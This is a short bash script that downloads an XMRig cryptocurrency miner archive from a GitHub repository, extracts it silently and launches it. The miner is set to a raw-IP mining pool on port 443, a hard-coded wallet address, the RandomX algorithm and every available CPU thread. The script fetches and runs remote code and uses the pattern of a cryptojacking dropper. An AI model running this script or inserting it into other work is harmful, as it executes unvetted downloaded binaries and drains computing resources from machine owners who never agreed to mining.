#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --donate-level 1 -o 157.245.152.17:443 -u ZEPHs8KEhW872XsESYJMgJ5HUv1F8C2HwaTu3Ez5nt7QTcqF19k3nPTWKsJw3HNzd7eNdfywpmFkn1n3EWzqbuRe2ZmH7qeNbA3 -p LOTEX -a rx/0 -t $(nproc --all)